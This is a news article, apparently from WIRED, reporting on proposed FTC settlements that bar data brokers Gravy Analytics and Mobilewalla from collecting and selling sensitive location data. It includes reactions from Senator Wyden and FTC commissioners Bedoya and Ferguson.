According to the two settlements, which must be finalized in court before they would go into effect, Gravy Analytics and Mobilewalla are barred from collecting sensitive location data from consumers and must delete the historical data they gathered on millions of Americans. Mobilewalla would be banned from acquiring location data and other sensitive information from online auctions known as real-time bidding exchanges, marketplaces where advertisers compete to instantaneously deliver ads to targeted consumers. This case marks the first time the FTC has moved to police the collection of data directly from an ad exchange.

In another first, the proposed Gravy Analytics settlement would introduce military installations to the list of “sensitive locations” where the FTC bans location tracking. Under the terms, the company would be prohibited from selling, disclosing, or using data drawn from these locations, which include mental health clinics, substance abuse centers, and child care service providers.

In November, a collaborative investigation by WIRED, Bayerischer Rundfunk, and Netzpolitik.org revealed that over 3 billion phone location data points, collected by a US-based data broker, exposed the movements of US military and intelligence personnel in Germany. These movements included visits to nuclear vaults and brothels. In that story, WIRED first reported on FTC chair Lina Khan’s efforts to shield US military and intelligence personnel from data brokers.

US senator Ron Wyden of Oregon, who first urged the FTC to take action against Mobilewalla in 2020, praised the announcements, calling the companies’ actions “outrageous violations of Americans’ privacy.”

“These companies enabled US government agencies to surveil Americans without a warrant and enabled foreign countries to spy on service members with just a credit card,” says Wyden, who also previously investigated Venntel with other members of Congress.

While the FTC’s orders don’t directly tackle the issue of government agencies purchasing Americans’ location data—information for which a warrant is normally required—Wyden says the cases nevertheless undermine the government’s case for allowing the purchases. The orders make clear, he says, that federal agencies are hiding behind a “flimsy claim that Americans consented to the sale of their data.”

In a statement, FTC commissioner Alvaro Bedoya notes that while surveillance conducted by private companies won't raise the same constitutional issues as surveillance by government, the difference between the two is “porous if not irrelevant” to the people being watched. "Governments have long relied on private citizens for work that would be impractical or illegal for law enforcement," he says.

Whether the orders against Gravy Analytics and Mobilewalla will be enforced remains to be seen. Major changes are coming to the agency under the future Trump administration—most expected to undermine years of work by Khan and her staff. Many of Donald Trump's allies have been vocally critical of Khan's aggressive pro-consumer approach, including Republican megadonor Elon Musk, who has taken command of an ad hoc office that will purportedly advise the White House on improving “government efficiency.”

FTC commissioner Andrew Ferguson, whose name was floated last month as a potential Khan replacement, partially concurred with the agency’s decision to bring cases against the two data brokers on Tuesday. He agreed the companies had taken insufficient steps to ensure consumer data was properly anonymized, adding that they’d failed to obtain the “meaningfully informed consent” of the consumers they targeted.

Unlike Khan, however, Ferguson argues that the companies did not run afoul of the law by “categorizing consumers based on sensitive characteristics,” such as whether they attend church or political meetings. “These are all public acts that people carry out in the sight of their fellow citizens every day,” he says.

Ferguson likewise chastised the agency for attempting to restrict the power of data brokers to target protesters specifically. “Treating attendance at a political protest as uniquely private and sensitive is an oxymoron,” he says.

In a separate action Tuesday morning, the Consumer Financial Protection Bureau announced it was taking steps to crack down on predatory data brokers that traffic in people’s financial information, calling the practice a gateway for “scamming, stalking, and spying.”

Musk, who donated more than $100 million toward Trump’s reelection, called publicly last week for the bureau to be “deleted.”

Search

lenovo warranty check/lookup | check warranty status | lenovo support us